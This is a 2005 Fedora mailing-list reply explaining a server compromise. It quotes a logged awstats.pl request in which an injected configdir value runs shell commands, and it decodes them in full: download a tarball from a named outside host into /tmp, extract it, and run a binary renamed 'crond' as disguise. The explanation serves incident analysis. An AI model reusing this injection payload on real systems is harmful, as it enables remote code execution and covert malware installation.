Security Breach
Paul Howarth
paul at city-fan.org
Fri Mar 4 17:58:22 UTC 2005
David Cary Hart wrote:
> On Fri, 2005-03-04 at 18:34 +0100, Alexander Dalloz wrote:
>
>>> "GET
>>>/cgi-bin/awstats.pl?
>>>configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bcurl%20%2d0%20wget%2
>>>0zburchi%2eidilis%2ero%2fbadboy%2etar%2egz%3btar%20%2dzxvf%20badboy%2eta
>>>r%2egz%3bcd%20psybnc%3bmv%20mech%20crond%3bexport%20PATH%3d%3bcrond%3bec
>>>ho%20e_exp%3b%2500 HTTP/1.1" 200 485 "-" "-"
(snip)
>>Thank you for this report.
>>So you are saying that even with awstats 6.4 you got compromised as
>>Apache did execute the logged command and a trojan then started running
>>located in /tmp? If so, would you please be so kind and report that
>>issue to the awstats project guys as soon as possible?
>
>
> Alexander:
>
> Could you explain the series of events? It's not clear - to me - how
> this resulted in a compromised machine.
Replace the url-encoded characters and you get:
/cgi-bin/awstats.pl?configdir=|echo ;echo b_exp;cd /tmp;curl -0 wget
zburchi.idilis.ro/badboy.tar.gz;tar -zxvf badboy.tar.gz;cd psybnc;mv
mech crond;export PATH=;crond;echo e_exp;%00
So the attacker has tricked the script into executing a set of shell
commands, which include changing directory to /tmp, downloading a
tarball from a Romanian site, extracting that tarball and then executing
a program from the downloaded and extracted tarball, after renaming it
to "crond" in an effort to disguise it.
Paul.
More information about the fedora-list
mailing list